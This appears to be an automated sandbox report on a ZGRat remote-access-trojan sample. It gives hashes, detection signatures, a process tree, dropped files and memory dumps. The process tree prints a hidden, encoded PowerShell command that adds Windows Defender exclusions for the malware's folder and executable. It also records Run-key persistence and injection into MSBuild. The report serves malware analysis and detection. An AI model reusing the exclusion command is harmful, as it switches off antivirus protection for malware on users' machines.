Analysis

  • max time kernel
    144s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    03/02/2024, 13:20

General

  • Target

    tmp.exe

  • Size

    1.1MB

  • MD5

    7f10c635e0952b50be339aaad2f63df5

  • SHA1

    26e8b3b179e8717c1e3d16b3e84a4a50e5e4f282

  • SHA256

    9ba372b8822cbf5a131c426cc16a1e7d1ded7ade81b1b2887ac70ad8c001beb8

  • SHA512

    009c6a22829b1fe89678b077e7ad4557408ab317f789c610080c2b3a454e1d8a8b1ecd0bf90df28cf8c7d0d9a456688d4ac73a92f10ca14bd5977db1ab0b2264

  • SSDEEP

    24576:ys4YTKDbbnCFPQWWxU7GbyggPiwJEEhwsio2:9BmaF0U6hgzZC

Score
10/10

Malware Config

Signatures

  • Detect ZGRat V1 36 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\tmp.exe
    "C:\Users\Admin\AppData\Local\Temp\tmp.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2080
    • C:\Users\Admin\AppData\Local\Temp\tmp.exe
      C:\Users\Admin\AppData\Local\Temp\tmp.exe
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1620
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {980745E1-E313-4383-8653-29BED17A8448} S-1-5-21-2444714103-3190537498-3629098939-1000:DJLAPDMX\Admin:S4U:
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2964
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABCAGEAcwBlAEQAaQByAGUAYwB0AG8AcgB5AC4AZQB4AGUAOwA=
      2⤵
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2696
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABCAGEAcwBlAEQAaQByAGUAYwB0AG8AcgB5AC4AZQB4AGUAOwA=
      2⤵
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2932
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {7EB62D10-D3FB-415F-9072-E0CA74A757B4} S-1-5-21-2444714103-3190537498-3629098939-1000:DJLAPDMX\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2836
    • C:\Users\Admin\AppData\Local\_NewEnum\fgpgxz\BaseDirectory.exe
      C:\Users\Admin\AppData\Local\_NewEnum\fgpgxz\BaseDirectory.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2896
      • C:\Users\Admin\AppData\Local\_NewEnum\fgpgxz\BaseDirectory.exe
        C:\Users\Admin\AppData\Local\_NewEnum\fgpgxz\BaseDirectory.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1608
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          4⤵
          • Suspicious use of SetThreadContext
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:556
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
            C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1792

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\_NewEnum\fgpgxz\BaseDirectory.exe

    Filesize

    1.1MB

    MD5

    7f10c635e0952b50be339aaad2f63df5

    SHA1

    26e8b3b179e8717c1e3d16b3e84a4a50e5e4f282

    SHA256

    9ba372b8822cbf5a131c426cc16a1e7d1ded7ade81b1b2887ac70ad8c001beb8

    SHA512

    009c6a22829b1fe89678b077e7ad4557408ab317f789c610080c2b3a454e1d8a8b1ecd0bf90df28cf8c7d0d9a456688d4ac73a92f10ca14bd5977db1ab0b2264

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    8750bb6bf4d71be6b1195fd6a7348dfe

    SHA1

    70bd0740e9a1265e0b4f2f64b52721883fd2105d

    SHA256

    8a8d680adc23040185cee5efcf7a5bf964ca7e0cc0756dd9804d99e18cf01d86

    SHA512

    d2666da2fc2718d91b1d4a714ddbfef5aae142103f042ef8a77eab26bd97dc3fa65cd0b178fadc6c90bb0ed874dcf7f478a3cd450743286866475cf96d1032eb

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\A4PPAM1CO5JD3EQP2D66.temp

    Filesize

    7KB

    MD5

    861cd3d1b3e2ce9177e3d67dd51948cb

    SHA1

    f6c79b758a616f640a1a390cb45cb458f66ae1f2

    SHA256

    8afab6ebbc557b29c45c583f37d6129bb41c1619e35fdfeb454821a34f82402e

    SHA512

    f286d3ed2824fd411cc8b2c3a0f982a9ccc004d42c30b344bd1633ac88a8a679e65d9ef0f0844b3f16f2d9df5f50bda9feb2d260feee73d96f04d04d1f610fcb

  • memory/556-6377-0x0000000000530000-0x0000000000570000-memory.dmp

    Filesize

    256KB

  • memory/556-6709-0x00000000742F0000-0x00000000749DE000-memory.dmp

    Filesize

    6.9MB

  • memory/556-7324-0x0000000000580000-0x0000000000581000-memory.dmp

    Filesize

    4KB

  • memory/556-7337-0x00000000742F0000-0x00000000749DE000-memory.dmp

    Filesize

    6.9MB

  • memory/556-6376-0x0000000000400000-0x000000000052C000-memory.dmp

    Filesize

    1.2MB

  • memory/556-6375-0x00000000742F0000-0x00000000749DE000-memory.dmp

    Filesize

    6.9MB

  • memory/1608-6374-0x00000000742F0000-0x00000000749DE000-memory.dmp

    Filesize

    6.9MB

  • memory/1608-6361-0x00000000742F0000-0x00000000749DE000-memory.dmp

    Filesize

    6.9MB

  • memory/1608-6360-0x0000000004EE0000-0x0000000004F34000-memory.dmp

    Filesize

    336KB

  • memory/1608-4146-0x00000000011F0000-0x0000000001230000-memory.dmp

    Filesize

    256KB

  • memory/1608-4144-0x00000000742F0000-0x00000000749DE000-memory.dmp

    Filesize

    6.9MB

  • memory/1608-4143-0x0000000000400000-0x000000000049C000-memory.dmp

    Filesize

    624KB

  • memory/1620-956-0x0000000000400000-0x000000000049C000-memory.dmp

    Filesize

    624KB

  • memory/1620-957-0x0000000073EE0000-0x00000000745CE000-memory.dmp

    Filesize

    6.9MB

  • memory/1620-3177-0x0000000073EE0000-0x00000000745CE000-memory.dmp

    Filesize

    6.9MB

  • memory/1620-3175-0x0000000004E60000-0x0000000004EB4000-memory.dmp

    Filesize

    336KB

  • memory/1620-3174-0x00000000006B0000-0x0000000000706000-memory.dmp

    Filesize

    344KB

  • memory/1620-959-0x0000000002240000-0x0000000002328000-memory.dmp

    Filesize

    928KB

  • memory/1620-958-0x0000000004840000-0x0000000004880000-memory.dmp

    Filesize

    256KB

  • memory/1792-9556-0x00000000745D0000-0x0000000074CBE000-memory.dmp

    Filesize

    6.9MB

  • memory/1792-7341-0x00000000745D0000-0x0000000074CBE000-memory.dmp

    Filesize

    6.9MB

  • memory/2080-14-0x00000000045E0000-0x0000000004703000-memory.dmp

    Filesize

    1.1MB

  • memory/2080-8-0x00000000045E0000-0x0000000004703000-memory.dmp

    Filesize

    1.1MB

  • memory/2080-54-0x00000000045E0000-0x0000000004703000-memory.dmp

    Filesize

    1.1MB

  • memory/2080-48-0x00000000045E0000-0x0000000004703000-memory.dmp

    Filesize

    1.1MB

  • memory/2080-46-0x00000000045E0000-0x0000000004703000-memory.dmp

    Filesize

    1.1MB

  • memory/2080-56-0x00000000045E0000-0x0000000004703000-memory.dmp

    Filesize

    1.1MB

  • memory/2080-60-0x00000000045E0000-0x0000000004703000-memory.dmp

    Filesize

    1.1MB

  • memory/2080-62-0x00000000045E0000-0x0000000004703000-memory.dmp

    Filesize

    1.1MB

  • memory/2080-58-0x00000000045E0000-0x0000000004703000-memory.dmp

    Filesize

    1.1MB

  • memory/2080-64-0x00000000045E0000-0x0000000004703000-memory.dmp

    Filesize

    1.1MB

  • memory/2080-42-0x00000000045E0000-0x0000000004703000-memory.dmp

    Filesize

    1.1MB

  • memory/2080-66-0x00000000045E0000-0x0000000004703000-memory.dmp

    Filesize

    1.1MB

  • memory/2080-935-0x00000000007C0000-0x0000000000800000-memory.dmp

    Filesize

    256KB

  • memory/2080-936-0x00000000003C0000-0x00000000003C1000-memory.dmp

    Filesize

    4KB

  • memory/2080-938-0x0000000004DA0000-0x0000000004DEC000-memory.dmp

    Filesize

    304KB

  • memory/2080-937-0x0000000004CE0000-0x0000000004DA0000-memory.dmp

    Filesize

    768KB

  • memory/2080-952-0x00000000745D0000-0x0000000074CBE000-memory.dmp

    Filesize

    6.9MB

  • memory/2080-52-0x00000000045E0000-0x0000000004703000-memory.dmp

    Filesize

    1.1MB

  • memory/2080-0-0x0000000000800000-0x000000000092C000-memory.dmp

    Filesize

    1.2MB

  • memory/2080-44-0x00000000045E0000-0x0000000004703000-memory.dmp

    Filesize

    1.1MB

  • memory/2080-38-0x00000000045E0000-0x0000000004703000-memory.dmp

    Filesize

    1.1MB

  • memory/2080-40-0x00000000045E0000-0x0000000004703000-memory.dmp

    Filesize

    1.1MB

  • memory/2080-36-0x00000000045E0000-0x0000000004703000-memory.dmp

    Filesize

    1.1MB

  • memory/2080-32-0x00000000045E0000-0x0000000004703000-memory.dmp

    Filesize

    1.1MB

  • memory/2080-30-0x00000000045E0000-0x0000000004703000-memory.dmp

    Filesize

    1.1MB

  • memory/2080-34-0x00000000045E0000-0x0000000004703000-memory.dmp

    Filesize

    1.1MB

  • memory/2080-1-0x00000000745D0000-0x0000000074CBE000-memory.dmp

    Filesize

    6.9MB

  • memory/2080-2-0x00000000045E0000-0x000000000470A000-memory.dmp

    Filesize

    1.2MB

  • memory/2080-3-0x00000000045E0000-0x0000000004703000-memory.dmp

    Filesize

    1.1MB

  • memory/2080-6-0x00000000045E0000-0x0000000004703000-memory.dmp

    Filesize

    1.1MB

  • memory/2080-4-0x00000000045E0000-0x0000000004703000-memory.dmp

    Filesize

    1.1MB

  • memory/2080-50-0x00000000045E0000-0x0000000004703000-memory.dmp

    Filesize

    1.1MB

  • memory/2080-28-0x00000000045E0000-0x0000000004703000-memory.dmp

    Filesize

    1.1MB

  • memory/2080-10-0x00000000045E0000-0x0000000004703000-memory.dmp

    Filesize

    1.1MB

  • memory/2080-12-0x00000000045E0000-0x0000000004703000-memory.dmp

    Filesize

    1.1MB

  • memory/2080-26-0x00000000045E0000-0x0000000004703000-memory.dmp

    Filesize

    1.1MB

  • memory/2080-16-0x00000000045E0000-0x0000000004703000-memory.dmp

    Filesize

    1.1MB

  • memory/2080-20-0x00000000045E0000-0x0000000004703000-memory.dmp

    Filesize

    1.1MB

  • memory/2080-24-0x00000000045E0000-0x0000000004703000-memory.dmp

    Filesize

    1.1MB

  • memory/2080-22-0x00000000045E0000-0x0000000004703000-memory.dmp

    Filesize

    1.1MB

  • memory/2080-18-0x00000000045E0000-0x0000000004703000-memory.dmp

    Filesize

    1.1MB

  • memory/2696-3184-0x0000000001650000-0x00000000016D0000-memory.dmp

    Filesize

    512KB

  • memory/2696-3189-0x000007FEF5AD0000-0x000007FEF646D000-memory.dmp

    Filesize

    9.6MB

  • memory/2696-3188-0x0000000001650000-0x00000000016D0000-memory.dmp

    Filesize

    512KB

  • memory/2696-3187-0x00000000010D0000-0x00000000010D8000-memory.dmp

    Filesize

    32KB

  • memory/2696-3182-0x0000000019EB0000-0x000000001A192000-memory.dmp

    Filesize

    2.9MB

  • memory/2696-3186-0x0000000001650000-0x00000000016D0000-memory.dmp

    Filesize

    512KB

  • memory/2696-3183-0x000007FEF5AD0000-0x000007FEF646D000-memory.dmp

    Filesize

    9.6MB

  • memory/2696-3185-0x000007FEF5AD0000-0x000007FEF646D000-memory.dmp

    Filesize

    9.6MB

  • memory/2896-4127-0x00000000001C0000-0x00000000001C1000-memory.dmp

    Filesize

    4KB

  • memory/2896-4126-0x0000000004930000-0x0000000004970000-memory.dmp

    Filesize

    256KB

  • memory/2896-3193-0x0000000001330000-0x000000000145C000-memory.dmp

    Filesize

    1.2MB

  • memory/2896-3192-0x00000000742F0000-0x00000000749DE000-memory.dmp

    Filesize

    6.9MB

  • memory/2896-4142-0x00000000742F0000-0x00000000749DE000-memory.dmp

    Filesize

    6.9MB

  • memory/2932-6703-0x00000000010E0000-0x0000000001160000-memory.dmp

    Filesize

    512KB

  • memory/2932-6707-0x00000000010E0000-0x0000000001160000-memory.dmp

    Filesize

    512KB

  • memory/2932-6708-0x000007FEF5130000-0x000007FEF5ACD000-memory.dmp

    Filesize

    9.6MB

  • memory/2932-6706-0x00000000010C0000-0x00000000010C8000-memory.dmp

    Filesize

    32KB

  • memory/2932-6705-0x00000000010E0000-0x0000000001160000-memory.dmp

    Filesize

    512KB

  • memory/2932-6704-0x0000000019E80000-0x000000001A162000-memory.dmp

    Filesize

    2.9MB

  • memory/2932-6702-0x00000000010E0000-0x0000000001160000-memory.dmp

    Filesize

    512KB

  • memory/2932-6701-0x000007FEF5130000-0x000007FEF5ACD000-memory.dmp

    Filesize

    9.6MB